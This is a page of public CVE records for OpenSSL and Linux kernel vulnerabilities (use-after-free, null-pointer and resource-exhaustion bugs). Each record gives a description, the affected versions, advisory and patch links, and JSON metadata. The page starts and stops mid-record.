"2022-12-18T00:00:00", "dateReserved": "2022-12-18T00:00:00", "dateUpdated": "2024-08-03T14:55:08.339Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0215
Vulnerability from cvelistv5
Published
2023-02-08 19:03
Modified
2024-08-02 05:02
Severity ?
EPSS score ?
Summary
The public API function BIO_new_NDEF is a helper function used for streaming
ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the
SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by
end user applications.
The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter
BIO onto the front of it to form a BIO chain, and then returns the new head of
the BIO chain to the caller. Under certain conditions, for example if a CMS
recipient public key is invalid, the new filter BIO is freed and the function
returns a NULL result indicating a failure. However, in this case, the BIO chain
is not properly cleaned up and the BIO passed by the caller still retains
internal pointers to the previously freed filter BIO. If the caller then goes on
to call BIO_pop() on the BIO then a use-after-free will occur. This will most
likely result in a crash.
This scenario occurs directly in the internal function B64_write_ASN1() which
may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on
the BIO. This internal function is in turn called by the public API functions
PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream,
SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7.
Other public API functions that may be impacted by this include
i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and
i2d_PKCS7_bio_stream.
The OpenSSL cms and smime command line applications are similarly affected.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:02:43.944Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "name": "3.0.8 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd" }, { "name": "1.1.1t git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344" }, { "name": "1.0.2zg patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230427-0007/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230427-0009/" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.0.8", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1t", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zg", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "Octavio Galland (Max Planck Institute for Security and Privacy)" }, { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "Marcel B\u00f6hme (Max Planck Institute for Security and Privacy)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Viktor Dukhovni" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Matt Caswell" } ], "datePublic": "2023-02-07T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "The public API function BIO_new_NDEF is a helper function used for streaming\u003cbr\u003eASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the\u003cbr\u003eSMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by\u003cbr\u003eend user applications.\u003cbr\u003e\u003cbr\u003eThe function receives a BIO from the caller, prepends a new BIO_f_asn1 filter\u003cbr\u003eBIO onto the front of it to form a BIO chain, and then returns the new head of\u003cbr\u003ethe BIO chain to the caller. Under certain conditions, for example if a CMS\u003cbr\u003erecipient public key is invalid, the new filter BIO is freed and the function\u003cbr\u003ereturns a NULL result indicating a failure. However, in this case, the BIO chain\u003cbr\u003eis not properly cleaned up and the BIO passed by the caller still retains\u003cbr\u003einternal pointers to the previously freed filter BIO. If the caller then goes on\u003cbr\u003eto call BIO_pop() on the BIO then a use-after-free will occur. This will most\u003cbr\u003elikely result in a crash.\u003cbr\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThis scenario occurs directly in the internal function B64_write_ASN1() which\u003cbr\u003emay cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on\u003cbr\u003ethe BIO. This internal function is in turn called by the public API functions\u003cbr\u003ePEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream,\u003cbr\u003eSMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7.\u003cbr\u003e\u003cbr\u003eOther public API functions that may be impacted by this include\u003cbr\u003ei2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and\u003cbr\u003ei2d_PKCS7_bio_stream.\u003cbr\u003e\u003cbr\u003eThe OpenSSL cms and smime command line applications are similarly affected.\u003cbr\u003e\u003cbr\u003e\u003c/div\u003e" } ], "value": "The public API function BIO_new_NDEF is a helper function used for streaming\nASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the\nSMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by\nend user applications.\n\nThe function receives a BIO from the caller, prepends a new BIO_f_asn1 filter\nBIO onto the front of it to form a BIO chain, and then returns the new head of\nthe BIO chain to the caller. Under certain conditions, for example if a CMS\nrecipient public key is invalid, the new filter BIO is freed and the function\nreturns a NULL result indicating a failure. However, in this case, the BIO chain\nis not properly cleaned up and the BIO passed by the caller still retains\ninternal pointers to the previously freed filter BIO. If the caller then goes on\nto call BIO_pop() on the BIO then a use-after-free will occur. This will most\nlikely result in a crash.\n\n\n\nThis scenario occurs directly in the internal function B64_write_ASN1() which\nmay cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on\nthe BIO. This internal function is in turn called by the public API functions\nPEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream,\nSMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7.\n\nOther public API functions that may be impacted by this include\ni2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and\ni2d_PKCS7_bio_stream.\n\nThe OpenSSL cms and smime command line applications are similarly affected.\n\n\n\n" } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Moderate" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": "use-after-free", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-24T14:43:53.180Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "name": "3.0.8 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd" }, { "name": "1.1.1t git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344" }, { "name": "1.0.2zg patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb" }, { "url": "https://security.netapp.com/advisory/ntap-20230427-0007/" }, { "url": "https://security.netapp.com/advisory/ntap-20230427-0009/" }, { "url": "https://security.gentoo.org/glsa/202402-08" }, { "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "source": { "discovery": "UNKNOWN" }, "title": "Use-after-free following BIO_new_NDEF", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-0215", "datePublished": "2023-02-08T19:03:28.691Z", "dateReserved": "2023-01-11T11:59:16.647Z", "dateUpdated": "2024-08-02T05:02:43.944Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0590
Vulnerability from cvelistv5
Published
2023-03-23 00:00
Modified
2024-08-02 05:17
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue. If patch ebda44da44f6 ("net: sched: fix race condition in qdisc_graft()") not applied yet, then kernel could be affected.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:17:49.847Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20221018203258.2793282-1-edumazet%40google.com/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.1-rc2" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue. If patch ebda44da44f6 (\"net: sched: fix race condition in qdisc_graft()\") not applied yet, then kernel could be affected." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:06:27.652362", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/all/20221018203258.2793282-1-edumazet%40google.com/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-0590", "datePublished": "2023-03-23T00:00:00", "dateReserved": "2023-01-31T00:00:00", "dateUpdated": "2024-08-02T05:17:49.847Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-3759
Vulnerability from cvelistv5
Published
2022-08-23 00:00
Modified
2024-08-03 17:09
Severity ?
EPSS score ?
Summary
A memory overflow vulnerability was found in the Linux kernel’s ipc functionality of the memcg subsystem, in the way a user calls the semget function multiple times, creating semaphores. This flaw allows a local user to starve the resources, causing a denial of service. The highest threat from this vulnerability is to system availability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T17:09:08.717Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999675" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3759" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-mm/1626333284-1404-1-git-send-email-nglaive%40gmail.com/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in Linux kernel 5.15-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory overflow vulnerability was found in the Linux kernel\u2019s ipc functionality of the memcg subsystem, in the way a user calls the semget function multiple times, creating semaphores. This flaw allows a local user to starve the resources, causing a denial of service. The highest threat from this vulnerability is to system availability." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 - Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-22T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999675" }, { "url": "https://access.redhat.com/security/cve/CVE-2021-3759" }, { "url": "https://lore.kernel.org/linux-mm/1626333284-1404-1-git-send-email-nglaive%40gmail.com/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2021-3759", "datePublished": "2022-08-23T00:00:00", "dateReserved": "2021-09-01T00:00:00", "dateUpdated": "2024-08-03T17:09:08.717Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3621
Vulnerability from cvelistv5
Published
2022-10-20 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:03.245Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=21a87d88c2253350e115029f14fe2a10a7e6c856" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211920" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-404", "description": "CWE-404 Denial of Service -\u003e CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=21a87d88c2253350e115029f14fe2a10a7e6c856" }, { "url": "https://vuldb.com/?id.211920" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel nilfs2 inode.c nilfs_bmap_lookup_at_level null pointer dereference", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3621", "datePublished": "2022-10-20T00:00:00", "dateReserved": "2022-10-20T00:00:00", "dateUpdated": "2024-08-03T01:14:03.245Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43750
Vulnerability from cvelistv5
Published
2022-10-26 00:00
Modified
2024-08-03 13:40
Severity ?
EPSS score ?
Summary
drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor's internal memory.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:40:06.468Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/a659daf63d16aa883be42f3f34ff84235c302198" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a659daf63d16aa883be42f3f34ff84235c302198" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19.15" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.0.1" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor\u0027s internal memory." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/a659daf63d16aa883be42f3f34ff84235c302198" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a659daf63d16aa883be42f3f34ff84235c302198" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19.15" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.0.1" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-43750", "datePublished": "2022-10-26T00:00:00", "dateReserved": "2022-10-26T00:00:00", "dateUpdated": "2024-08-03T13:40:06.468Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-47929
Vulnerability from cvelistv5
Published
2023-01-17 00:00
Modified
2024-08-03 15:02
Severity ?
EPSS score ?
Summary
In the Linux kernel before 6.1.6, a NULL pointer dereference bug in the traffic control subsystem allows an unprivileged user to trigger a denial of service (system crash) via a crafted traffic control configuration that is set up with "tc qdisc" and "tc class" commands. This affects qdisc_graft in net/sched/sch_api.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:02:36.590Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/netdev/msg555705.html" }, { "tags": [ "x_transferred" ], "url": "https://tldp.org/HOWTO/Traffic-Control-HOWTO/components.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=96398560f26aa07e8f2969d73c8197e6a6d10407" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.1.6" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel before 6.1.6, a NULL pointer dereference bug in the traffic control subsystem allows an unprivileged user to trigger a denial of service (system crash) via a crafted traffic control configuration that is set up with \"tc qdisc\" and \"tc class\" commands. This affects qdisc_graft in net/sched/sch_api.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.spinics.net/lists/netdev/msg555705.html" }, { "url": "https://tldp.org/HOWTO/Traffic-Control-HOWTO/components.html" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=96398560f26aa07e8f2969d73c8197e6a6d10407" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.1.6" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-47929", "datePublished": "2023-01-17T00:00:00", "dateReserved": "2022-12-22T00:00:00", "dateUpdated": "2024-08-03T15:02:36.590Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42722
Vulnerability from cvelistv5
Published
2022-10-13 00:00
Modified
2024-08-03 13:10
Severity ?
EPSS score ?
Summary
In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:10:41.460Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204125" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=b2d03cabe2b2e150ff5a381731ea0355459be09f" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204125" }, { "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=b2d03cabe2b2e150ff5a381731ea0355459be09f" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-42722", "datePublished": "2022-10-13T00:00:00", "dateReserved": "2022-10-10T00:00:00", "dateUpdated": "2024-08-03T13:10:41.460Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41218
Vulnerability from cvelistv5
Published
2022-09-21 00:00
Modified
2024-08-03 12:35
Severity ?
EPSS score ?
Summary
In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release.
References
